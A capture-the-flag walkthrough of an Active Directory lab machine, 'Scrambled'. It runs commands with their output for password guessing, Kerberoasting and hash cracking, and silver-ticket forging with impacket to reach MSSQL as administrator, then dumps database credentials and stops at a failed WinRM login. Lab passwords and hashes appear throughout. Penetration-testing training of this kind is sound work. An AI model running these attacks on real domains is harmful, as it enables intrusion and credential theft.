Tracks-AD-Scrambled

AD
27k words

Solved two things that had bugged me for a long time: LDAPS needing a certificate, and SMB connections with Kerberos authentication.

Nmap

10.10.11.168

└─$ sudo nmap -sS 10.10.11.168 -p- --min-rate=2000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 03:31 EST
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 37.25% done; ETC: 03:33 (0:01:01 remaining)
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 03:33 (0:00:00 remaining)
Nmap scan report for 10.10.11.168
Host is up (0.13s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
4411/tcp open found
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49700/tcp open unknown
49705/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 98.57 seconds


└─$ sudo nmap -sU 10.10.11.168 --top-ports=200 --min-rate=2000
[sudo] password for fonllge:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 03:32 EST
Nmap scan report for 10.10.11.168
Host is up (0.13s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

Nmap done: 1 IP address (1 host up) scanned in 1.03 seconds

ldap

└─$ ldapsearch -x -H ldap://10.10.11.168 -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=scrm,DC=local
ldapServiceName: scrm.local:dc1$@SCRM.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=scrm,DC=local
serverName: CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configura
tion,DC=scrm,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=scrm,DC=local
namingContexts: DC=scrm,DC=local
namingContexts: CN=Configuration,DC=scrm,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=scrm,DC=local
namingContexts: DC=DomainDnsZones,DC=scrm,DC=local
namingContexts: DC=ForestDnsZones,DC=scrm,DC=local
isSynchronized: TRUE
highestCommittedUSN: 290953
dsServiceName: CN=NTDS Settings,CN=DC1,CN=Servers,CN=Default-First-Site-Name,C
N=Sites,CN=Configuration,DC=scrm,DC=local
dnsHostName: DC1.scrm.local
defaultNamingContext: DC=scrm,DC=local
currentTime: 20250102081951.0Z
configurationNamingContext: CN=Configuration,DC=scrm,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

----
dc:DC1.scrm.local

to User

No SMB null session or anything of that sort, so the way in has to be the web side; let's look at that again.

First: they have turned off NTLM, so for everything that follows we must getTGT first and work with the TGT.

Next is how their admins reset passwords: for a user whose password has been reset, the username is the password.

Then there's one of their applications which, with debug enabled, writes all of its logs locally.

Finally, a support example from the IT support team.

In that IT-team support screenshot (not reproduced here) the username is ksimpson. Since reset accounts end up with a password equal to the username, let's test whether that is the case for this user.

└─$ kerbrute bruteforce -d scrm.local user  --dc 10.10.11.168 

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 01/02/25 - Ronnie Flathers @ropnop

2025/01/02 03:58:50 > Using KDC(s):
2025/01/02 03:58:50 > 10.10.11.168:88

2025/01/02 03:58:50 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
2025/01/02 03:58:50 > Done! Tested 1 logins (1 successes) in 0.582 seconds

And indeed that's how it is: this user was presumably reset and never changed the default password, ksimpson:ksimpson.

Since NTLM authentication is disabled, use impacket-getTGT to obtain a TGT and work with that.

impacket-getTGT 'scrm.local/ksimpson:ksimpson' -dc-ip 10.10.11.168

Then export KRB5CCNAME=<ccache path> to load the ticket (this is so basic that some of my earlier writeups seem to have skipped it).

Walking the dog (BloodHound)

└─$ bloodhound.py -c All -d scrm.local -u ksimpson -p ksimpson -k -no-pass -ns 10.10.11.168 -dc dc1.scrm.local --zip --use-ldaps
INFO: Found AD domain: scrm.local
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc1.scrm.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc1.scrm.local
INFO: Found 16 users
INFO: Found 62 groups
INFO: Found 6 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: WS01.scrm.local
INFO: Querying computer: DC1.scrm.local
INFO: Done in 00M 29S
INFO: Compressing output into 20250102042042_bloodhound.zip

Let's also take a look at SMB. I wanted to use smbclient, but connecting with -k (Kerberos) kept throwing errors, so I used impacket-smbclient instead, which connected fine this time. Evidently I still haven't figured out the native smbclient.

└─$ impacket-smbclient 'scrm.local/ksimpson:ksimpson@dc1.scrm.local' -k -dc-ip scrm.local          
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# help

open {host,port=445} - opens a SMB connection against the target host/port
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
lls {dirname} - lists all the files on the local filesystem.
tree {filepath} - recursively lists all files in folder and sub folders
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put (unknown) - uploads the filename into the current path
get (unknown) - downloads the filename from the current path
mget {mask} - downloads all files from the current directory matching the provided mask
cat (unknown) - reads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
list_snapshots {path} - lists the vss snapshots for the specified path
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)

List all share names:

# shares 
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL

Try them one by one (I forgot to run smbmap while doing the box, so trying each by hand makes me look a bit dumb). Public has something in it.

# use Public
# tree
/Network Security Changes.pdf
Finished - 0 files and folders
# ls
drw-rw-rw- 0 Thu Nov 4 18:23:19 2021 .
drw-rw-rw- 0 Thu Nov 4 18:23:19 2021 ..
-rw-rw-rw- 630106 Fri Nov 5 13:45:07 2021 Network Security Changes.pdf

Download it. The PDF says NTLM has now been removed entirely in favor of Kerberos authentication, and that because attackers steal credentials from the database, the HR group's database access was revoked; only the Administrators group may access the database now.

In short: the database holds credentials they're afraid of leaking, so only users in the Administrators group can access it.

No leads for now, so do the usual enumeration: run GetNPUsers and GetUserSPNs with the current user.

GetNPUsers produced nothing, but GetUserSPNs did pay off: we got the sqlsvc TGS.

└─$ impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-ip 10.10.11.168 -dc-host dc1.scrm.local  -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 12:32:02.351452 2025-01-02 04:18:41.272081
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 12:32:02.351452 2025-01-02 04:18:41.272081



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$512edc4e4....

Crack it and we get the credentials sqlsvc:Pegasus60.

└─$ hashcat svc_sql_hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$512edc4e41...:Pegasus60

We actually got the password of the MSSQL service account, so we can forge a silver ticket: a forged TGS for administrator with which to access MSSQL.

For reference:

https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/silver

The essentials: the domain SID, the SID of the user to impersonate, and the service account's NT hash.

First, the administrator SID. There are plenty of ways: lookupsid, PowerView, LDAP, getPac, the BloodHound graph, and so on. But it was in 0xdf's writeup that I found the fix for the LDAPS certificate error that had bugged me for ages, so I'll briefly record the LDAPS setup.

ldaps

https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html#ldap---tcp-389

In plain terms, you still need to set up a certificate on the client side.

So first, obtain the certificate (pulled from the server with openssl s_client):

└─$ openssl s_client -host dc1.scrm.local  -connect dc1.scrm.local:636
Connecting to 10.10.11.168
CONNECTED(00000003)
depth=0
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0
verify return:1
---
Certificate chain
0 s:
i:DC=local, DC=scrm, CN=scrm-DC1-CA
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA1
v:NotBefore: Sep 4 11:14:45 2024 GMT; NotAfter: Jun 8 22:39:53 2121 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----

Save the CERTIFICATE part to a file; that is the PEM that /etc/ldap/ldap.conf will point at next.

Edit ldap.conf and add a line pointing at the path where the certificate was saved:

└─$ sudo cat /etc/ldap/ldap.conf
#
# LDAP Defaults
#

# See ldap.conf(5) for details
# This file should be world readable but not world writable.

#BASE dc=example,dc=com
#URI ldap://ldap.example.com ldap://ldap-provider.example.com:666

#SIZELIMIT 12
#TIMELIMIT 15
#DEREF never

# TLS certificates (needed for GnuTLS)
#TLS_CACERT /etc/ssl/certs/ca-certificates.crt
TLS_CACERT /home/Desktop/htb/Scrambled/sqlsvc.pem

Now ldapsearch can connect over LDAPS:

└─$ ldapsearch -x -Z -H ldaps://dc1.scrm.local:636 -s base -D 'sqlsvc@scrm.local' -w 'Pegasus60'
ldap_start_tls: Operations error (1)
additional info: 00000000: LdapErr: DSID-0C091325, comment: TLS or SSL already in effect, data 0, v4563
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=scrm,DC=local
ldapServiceName: scrm.local:dc1$@SCRM.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
...
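
The LDAPS setup above boils down to two steps: pull the PEM block out of the openssl s_client output, and point TLS_CACERT at a file containing it. The Python below is an added example of my own, not code from this writeup or from 0xdf's post: it extracts every PEM certificate block from s_client-style text, checks that each block decodes, builds the bundle text that TLS_CACERT expects, and returns a verifying ssl context for a direct TLS connection to port 636. Hostname verification stays on, which is why the DC must be addressed as dc1.scrm.local rather than by IP. One caveat worth knowing from the output above: -Z requests StartTLS, which is redundant on an ldaps:// URL; the "TLS or SSL already in effect" line is the server saying exactly that. The sample s_client text and its certificate body are constructed placeholders, not a real certificate, and every function name is mine.

```python
import base64
import re
import ssl

# One PEM block per match; DOTALL so the base64 body may span several lines.
PEM_BLOCK_RE = re.compile(
    r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.DOTALL
)


def extract_pem_certificates(text: str) -> list[str]:
    """Return every PEM certificate block found in openssl s_client output."""
    return [m.group(0) for m in PEM_BLOCK_RE.finditer(text)]


def pem_to_der(pem: str) -> bytes:
    """Decode one PEM block to DER bytes; raises ValueError if the block is malformed."""
    return ssl.PEM_cert_to_DER_cert(pem)


def ca_bundle_text(pems: list[str]) -> str:
    """Concatenate blocks into the file layout TLS_CACERT / cafile expects."""
    return "".join(pem.strip() + "\n" for pem in pems)


def write_ca_bundle(pems: list[str], path: str) -> int:
    """Write the bundle to disk (e.g. the path used in ldap.conf) and return the block count."""
    with open(path, "w", encoding="ascii") as fh:
        fh.write(ca_bundle_text(pems))
    return len(pems)


def ldaps_context(ca_bundle_path: str) -> ssl.SSLContext:
    """Verifying context for a direct-TLS (ldaps://, port 636) connection.
    Hostname checking stays on, so connect to dc1.scrm.local, not the IP."""
    ctx = ssl.create_default_context(cafile=ca_bundle_path)
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


# Constructed sample s_client output. The certificate body is base64 of placeholder
# bytes, not a real certificate: pem_to_der() round-trips it, but ldaps_context()
# would refuse to load it as a trust anchor.
FAKE_DER = b"constructed-placeholder-not-a-real-certificate"
SAMPLE_S_CLIENT_OUTPUT = (
    "CONNECTED(00000003)\n"
    "depth=0\n"
    "verify error:num=20:unable to get local issuer certificate\n"
    "---\n"
    "Server certificate\n"
    "-----BEGIN CERTIFICATE-----\n"
    + base64.encodebytes(FAKE_DER).decode("ascii")
    + "-----END CERTIFICATE-----\n"
    "issuer=DC=local, DC=scrm, CN=scrm-DC1-CA\n"
)

if __name__ == "__main__":
    certs = extract_pem_certificates(SAMPLE_S_CLIENT_OUTPUT)
    print(f"found {len(certs)} certificate block(s)")
    print(ca_bundle_text(certs), end="")
```

The writeup points TLS_CACERT at the server's own certificate, and the block treats whatever PEM it finds the same way; when the issuing CA's certificate (here scrm-DC1-CA) is available, trusting that instead is the cleaner choice, since it keeps working after the DC's leaf certificate is renewed.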

Still, I used powerview.py to look up the SID:

└─$ powerview scrm.local/sqlsvc:Pegasus60@dc1.scrm.local --dc-ip 10.10.11.168 -k

(LDAPS)-[DC1.scrm.local]-[SCRM\sqlsvc]
PV > Get-DomainObject -Identity administrator
objectClass : top
person
organizationalPerson
user
cn : Administrator
...
objectSid : S-1-5-21-2743207045-1827831105-2542523200-500
adminCount : 1
accountExpires : 9223372036854775807
logonCount : 257
sAMAccountName : administrator
sAMAccountType : SAM_USER_OBJECT
userPrincipalName : administrator@scrm.local
...

The user's id (RID) is 500. As there's no child domain or the like here, the domain SID is simply the prefix of the user SID: S-1-5-21-2743207045-1827831105-2542523200.
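
The split just described, domain SID as the prefix and the user id as the trailing RID, is easy to get wrong by hand, and the same split is what a defender uses to spot built-in principals in logs regardless of which domain they come from. The Python below is an added example of my own, not code from this writeup: it parses an object SID into (domain SID, RID), names the well-known RIDs, and runs a small audit over constructed event-log style lines, flagging logons by built-in privileged RIDs and any SID from a domain other than the expected one. The domain SID is the one shown on the page; the log lines, the RID 1105 for ksimpson and the second domain SID are invented, and the function names are mine.

```python
import re

# Well-known RIDs that identify built-in principals in any domain (constructed subset).
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    519: "Enterprise Admins",
}

# A domain SID is S-1-5-21-<sub1>-<sub2>-<sub3>; an object SID appends its RID.
OBJECT_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
SID_IN_TEXT_RE = re.compile(r"S-1-5-21-\d+-\d+-\d+-\d+")


def split_sid(sid: str) -> tuple[str, int]:
    """Return (domain SID, RID) for a domain object SID; raise on anything else."""
    m = OBJECT_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain object SID: {sid!r}")
    return m.group(1), int(m.group(2))


def describe_sid(sid: str) -> dict:
    """Name the RID when it is a well-known one."""
    domain_sid, rid = split_sid(sid)
    return {
        "domain_sid": domain_sid,
        "rid": rid,
        "name": WELL_KNOWN_RIDS.get(rid, "(domain-specific account)"),
    }


def audit_logon_lines(lines, expected_domain_sid: str):
    """Flag logons by built-in privileged RIDs, and any SID from an unexpected domain."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for sid in SID_IN_TEXT_RE.findall(line):
            domain_sid, rid = split_sid(sid)
            if domain_sid != expected_domain_sid:
                hits.append((lineno, sid, "unexpected domain SID"))
            elif rid in (500, 512, 519):
                hits.append((lineno, sid, WELL_KNOWN_RIDS[rid]))
    return hits


DOMAIN_SID = "S-1-5-21-2743207045-1827831105-2542523200"  # scrm.local, from the page

# Constructed event-log style lines (not real logs); RID 1105 is an invented normal user
# and the second domain SID is invented.
SAMPLE_LOG = [
    "4624 Security ID: S-1-5-21-2743207045-1827831105-2542523200-1105 Account Name: ksimpson Logon Process: Kerberos",
    "4624 Security ID: S-1-5-21-2743207045-1827831105-2542523200-500 Account Name: administrator Logon Process: Kerberos",
    "4624 Security ID: S-1-5-21-111111111-222222222-333333333-500 Account Name: administrator Logon Process: Kerberos",
]

if __name__ == "__main__":
    print(describe_sid(DOMAIN_SID + "-500"))
    for lineno, sid, why in audit_logon_lines(SAMPLE_LOG, DOMAIN_SID):
        print(f"line {lineno}: {sid} -> {why}")
```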

Next, the NT hash of the service account sqlsvc. Since we have the plaintext password, just generate one.

You can also generate it with openssl:

https://blog.atucom.net/2012/10/generate-ntlm-hashes-via-command-line.html

└─$ cat gen_pass2nthash
#!/usr/bin/bash
# NT hash = MD4 over the UTF-16LE encoding of the password.
# printf '%s' keeps a % or \ in the password from being treated as a format directive.
# On OpenSSL 3.x MD4 lives in the legacy provider; if "dgst -md4" errors, use
#   openssl dgst -provider legacy -provider default -md4
iconv -f ASCII -t UTF-16LE <(printf '%s' "$1") | openssl dgst -md4


└─$ gen_pass2nthash Pegasus60
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05

With the three required items collected we can make the silver ticket. The SPN is sqlsvc's, since it's the MSSQL service account.

Now we can take the silver ticket with administrator's identity and access MSSQL:

└─$ impacket-ticketer -spn 'MSSQLSvc/dc1.scrm.local'  -dc-ip 10.10.16.168  -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 -domain-sid  S-1-5-21-2743207045-1827831105-2542523200  administrator

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache

You can also leave out the target user id (-user-id), as below; it's personal preference, I like to spell everything out:

└─$ impacket-ticketer -spn 'MSSQLSvc/dc1.scrm.local'  -dc-ip 10.10.16.168  -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05  -domain-sid  S-1-5-21-2743207045-1827831105-2542523200  administrator

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache

Let's look at the ticket details:

└─$ python3 ~/tools/impacket/examples/describeTicket.py ./administrator.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : 6f59694f45596975426e44596a697547
[*] User Name : administrator
[*] User Realm : SCRM.LOCAL
[*] Service Name : MSSQLSvc/dc1.scrm.local
[*] Service Realm : SCRM.LOCAL
[*] Start Time : 02/01/2025 06:19:33 AM
[*] End Time : 31/12/2034 06:19:33 AM
[*] RenewTill : 31/12/2034 06:19:33 AM
[*] Flags : (0x50a00000) forwardable, proxiable, renewable, pre_authent
[*] KeyType : rc4_hmac
[*] Base64(key) : b1lpT0VZaXVCbkRZaml1Rw==
[*] Kerberoast hash : $krb5tgs$23$*USER$SCRM.LOCAL$MSSQLSvc/dc1.scrm.local*$9a97d5e5495646611aadfaa5913da2fa$4e7996d57fefd716eeceb39054f50a0a12cb05e8c51c84cd41dbed6eb40f597a0bb672b1008a6c7c7c61ab6272615df45635b29844e2549df9e42890324147aeb7402b3e5a436f9acbe7a51ff017c7b9162eb79a69d35793c6e10748d22991103aabfd1330881a1887298923023095787e7bd7ffa5e4c943c2957b0383403d2082ee879b44750ee0d7497a5b92833a3213214f4a147e23f1582c336e01bec852055bf1d2839e99097534fef0aea343aa72706f5fa79be646743a655fb8d65d1ca7d34e4a1d2734b2f60d66f1f173747c79888db2b7e4122b0d61923736f37b5c57ede0ca18f7f7b599b40b28693e1600f0f7c7744b9e40590c039741a92039aec452e5cd6588f6188a5f4e9c3ae9148ec3bf98ce6b7be5691a4e6cafacd9e609a3d5d3724f694c96b16cadfa60377a9cdd9a9dd5c1b2fc3a1a9dc2af3db0da10adb4822ca70b2821721eb112e71e6922b090954e54ed08df19db91e310857dbfb522d4642cb5a0dbe0d15a70078946ecc6bea8878d913f28f68d227ecc74ddc42b910e24740c6bc358ffcabf8a933d9b28fe47c3ecc1f0d5a4b1fc474c0b81c12fc1e466b6c8f50d47663bd8a6faf1dda873716247cde63e728a313e67f4d36896aeb8a549053629ae90b10f8aee802839780c24f37e40d84f3e66222225253d4ce7bc0ecf800dda4d8493d0f666b35dcdb663a9aaded80cfb005c14b4ab2d67dc20e34b74ad9255fc3515c4f39a3d59978ef1a14fc8b3eae049cc211496a20b931a7d279327341d78904c0345df41dcb3d8812b28f39ab1a76150b89dc1de802b28c2bd81ae3761852015a2db0a60ada877103c28cbfe4521ef2eeabfaca8f95f61274664f9a659ad1af86e422d26535145fb445845a521b068dc5c914c7484249f6b49554c6d8d3ea2df1a10dfc2f4d09f8d6c8ec8b6f9fa56fd129025546fd2f61bb47f6148c64917f1bdf95408b247a6facaa49e77975b7129abfcc16fcedeef521a5c7bc3e5755455a08181c04348be26cfcc775eae4457f8bf036264eac0d91fca268358b52197eb8f013b04f467e9cf05eae60805b36a13c258f7b2ba48a81152117335f2c18218903bd42a1108aa52fb6e079e71fc98a96110389ebea1ae9581bbf4e276b2ae0608969323ad5fc504cdd6685135f5afd8ba587e12d5875fb87347170bf52eddce3744b1539184b06712e30987a9b9a707281da1454512f247de06913000b4b67382025dede06e42df589479839111c7b4cf7f0b2ede5c74ced20bc33f9568ef0f70b8c36410085591c19a66611d
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : MSSQLSvc/dc1.scrm.local <-spn
[*] Service Realm : SCRM.LOCAL
[*] Encryption type : rc4_hmac (etype 23)
[-] Could not find the correct encryption key! Ticket is encrypted with rc4_hmac (etype 23), but no keys/creds were supplied

The SPN is the MSSQLSvc we specified, so we're good to go.

Load the ticket and connect to the database:

└─$ impacket-mssqlclient -dc-ip 10.10.11.168  dc1.scrm.local -k  -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: ./administrator.ccache
[+] Domain retrieved from CCache: SCRM.LOCAL
[+] SPN MSSQLSVC/DC1.SCRM.LOCAL:1433@SCRM.LOCAL not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for MSSQLSVC/DC1.SCRM.LOCAL@SCRM.LOCAL
[+] Using TGS from cache
[+] Changing sname from MSSQLSvc/dc1.scrm.local@SCRM.LOCAL to MSSQLSVC/DC1.SCRM.LOCAL:1433@SCRM.LOCAL and hoping for the best
[+] Username retrieved from CCache: administrator
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands

Let's see what databases there are. There's an HR one; the PDF said the HR group's database access was revoked over the risk of credential leakage, so it very likely holds credentials.

SQL (SCRM\administrator  dbo@master)> enum_db
name is_trustworthy_on
---------- -----------------
master 0

tempdb 0

model 0

msdb 1

ScrambleHR 0

Look at the tables:

SQL (SCRM\administrator  dbo@master)> use ScrambleHr;
SQL (SCRM\administrator dbo@ScrambleHR)> select name from sys.tables;
name
----------
Employees

UserImport

Timesheets

Of the three tables, only UserImport is non-empty.

SQL (SCRM\administrator  dbo@ScrambleHR)> select * from UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0

That gives us a set of credentials:

MiscSvc

ScrambledEggs9900

This user is in the ITShares group and Remote Management, but WinRM with his ticket wouldn't connect.

I changed the Kerberos config:

└─$ cat /etc/krb5.conf
[libdefaults]
default_realm = SCRM.LOCAL
dns_lookup_realm = true
dns_lookup_kdc = true

[realms]
SCRM.LOCAL = {
kdc = dc1.scrm.local
}

[domain_realm]
.scrm.local = SCRM.LOCAL
scrm.local = SCRM.LOCAL

Attempt the connection, but it still fails:

└─$ evil-winrm -r scrm.local -i dc1.scsrm.local -u miscsvc

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

